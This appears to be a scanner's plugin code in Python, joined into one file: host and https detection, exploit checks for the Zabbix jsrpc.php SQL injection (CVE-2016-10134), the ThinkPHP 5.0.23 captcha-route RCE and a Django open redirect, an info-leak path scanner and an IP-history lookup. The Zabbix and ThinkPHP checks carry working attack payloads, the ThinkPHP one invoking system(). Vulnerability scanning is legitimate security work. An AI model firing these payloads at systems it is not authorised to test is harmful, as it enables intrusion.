def __init__(self, host):
    """Set up per-host scan state.

    Args:
        host: the target this instance works on; stored as ``self.host``.

    The collections (``urls``, ``js``, ``result``) and ``domain`` start
    empty; what fills them is not visible in this block.
    """
    self.host = host
    self.domain = ''
    self.urls = []
    self.js = []
    self.result = []
    # The HTTP client is created last so a failing constructor leaves the
    # plain attributes already assigned, as before.
    self.req = Requests()
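def verify_https(url):
    """Work out whether a target answers on https or http.

    The original comments (translated): check whether the domain is
    http or https; if the domain answers with a 302 redirect, obtain
    the redirected address.

    Args:
        url: a full URL or a bare host/path.  Only the network location
            is kept (for a scheme-less input ``urlparse`` puts the host
            in ``path``, which is used instead).

    Returns:
        ``'https://www.<host>'`` when the https probe redirected (301/302)
        and the ``www.`` variant answered 200; otherwise ``'https://<host>'``
        when the https probe succeeded; ``'http://<host>'`` when only the
        plain-http probe succeeded; ``None`` when both raised.
    """
    req = Requests()
    parsed = parse.urlparse(url)
    if parsed.netloc:
        url = parsed.netloc
    elif parsed.path:
        url = parsed.path
    try:
        r = req.get(f'https://{url}')
        if r.status_code in (301, 302):
            www = f'https://www.{url}'
            # Only a clean 200 on the www. host replaces the bare host.
            if req.get(www).status_code == 200:
                return www
        return f'https://{url}'
    except Exception:
        # Any failure of the https probe -- connection refused, TLS
        # validation error, timeout -- silently downgrades to plain http.
        # The exception type is not inspected, so a certificate problem
        # and a closed port are treated the same.
        try:
            req.get(f'http://{url}')
            return f'http://{url}'
        except Exception:
            return None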
def check(url, ip, ports, apps):
    """Probe *url* for the Zabbix jsrpc.php SQL injection (CVE-2016-10134).

    The request is sent only when ``verify`` accepts the module-level
    ``vuln`` descriptor against *ports*/*apps*; ``ip`` is part of the
    plugin signature and is not used here.

    Returns:
        ``'CVE-2016-10134 zabbix sqli:' + url`` when the response body
        contains the marker expected from the injected ``md5()`` call or
        a ``'SQL error '`` string, otherwise ``None`` (also on any request
        failure, which is swallowed).
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    payload = r"/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
    try:
        body = req.get(url + payload).text
        marker_hit = 'ed733b8d10be225eceba344d533586' in body
        error_hit = 'SQL error ' in body
    except Exception:
        # Transport errors count as "not vulnerable".
        return None
    if marker_hit or error_hit:
        return 'CVE-2016-10134 zabbix sqli:' + url
    return None
def check(url, ip, ports, apps):
    """Probe *url* for the ThinkPHP 5.0.23 captcha-route RCE.

    Runs only when ``verify`` accepts the module-level ``vuln`` descriptor
    for *ports*/*apps*; ``ip`` is unused.  The POST body asks the server
    to echo the module-level ``random_num`` token, and a hit is reported
    only when that exact token appears in the response, which keeps
    false positives from generic error pages low.

    Returns:
        ``'thinkphp_5_0_23_rce | ' + url`` on a hit, otherwise ``None``
        (request failures are swallowed).
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    payload = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num)
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    try:
        resp = req.request(url + '/index.php?s=captcha', 'post', data=payload, headers=headers)
        hit = random_num in resp.text
    except Exception:
        return None
    return 'thinkphp_5_0_23_rce | ' + url if hit else None
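def check(url, ip, ports, apps):
    """Probe *url* for the Django < 2.0.8 open redirect.

    Requests ``url + '//www.example.com'`` and reports a hit when the
    server answers with a redirect whose ``Location`` header contains
    ``www.example.com``.  Runs only when ``verify`` accepts the
    module-level ``vuln`` descriptor for *ports*/*apps*; ``ip`` is unused.

    Returns:
        The project's finding label on a hit, otherwise ``None`` (request
        failures are swallowed).
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    payload = "//www.example.com"
    try:
        r = req.get(url + payload)
        # A redirect with no Location header previously raised TypeError
        # ('in' against None) and relied on the broad except; defaulting
        # to '' makes that case an explicit "no hit".
        location = r.headers.get('Location', '') if r.is_redirect else ''
    except Exception:
        return None
    if 'www.example.com' in location:
        return 'Django < 2.0.8 任意URL跳转漏洞'
    return None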
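def get_info(url):
    """Look for information-leak files under *url*.

    Each entry of the module-level ``path`` list is appended to *url*
    and fetched.  A 200 response is passed to ``verify`` unless its body
    contains ``'<html>'`` (case-sensitive) or a ``{"key":`` pattern
    anywhere in it (presumably to skip JSON/API responses; the intent is
    not stated in the source).

    Returns:
        ``'leaks : ' + url + entry`` for the first entry ``verify``
        accepts, else ``None``.  Any exception ends the whole loop for
        this *url* -- one failing path means the remaining paths are not
        tried, which is kept here as it looks deliberate for dead hosts.
    """
    try:
        req = Requests()
        for entry in path:
            r = req.get(url + entry)
            if r.status_code != 200 or '<html>' in r.text:
                continue
            if re.search(r'{"\w+":', r.text):
                continue
            if verify(r.text):
                return 'leaks : ' + url + entry
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
        # are no longer swallowed by a scan loop.
        return None
    return None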
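def ipinfo(host):
    """Collect historical IPv4 addresses for *host*, filtered by ``iscdn``.

    Args:
        host: a hostname.  Anything containing a dotted-quad substring
            (``re.search``, so ``'a1.2.3.4b'`` also matches) is treated
            as an IP and skipped without any request.

    Returns:
        list[str]: the dotted quads scraped from the viewdns.info
        IP-history table rows for which ``iscdn`` returned a truthy value
        (what that predicate encodes is not visible here); empty when the
        host was skipped, nothing matched, or the request failed.

    Note:
        This sends *host* to a third-party service and scrapes its HTML,
        so a layout change there silently produces ``[]``.
    """
    out = []
    if re.search(r'\d+\.\d+\.\d+\.\d+', host):
        return out
    req = Requests()
    try:
        r = req.get('https://viewdns.info/iphistory/?domain={}'.format(host))
        found = re.findall(
            r'(?<=<tr><td>)\d+\.\d+\.\d+\.\d+(?=</td><td>)', r.text, re.S | re.I)
        for addr in found:
            if iscdn(addr):
                out.append(addr)
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C is not swallowed;
        # on a failure the addresses gathered so far are still returned.
        pass
    return out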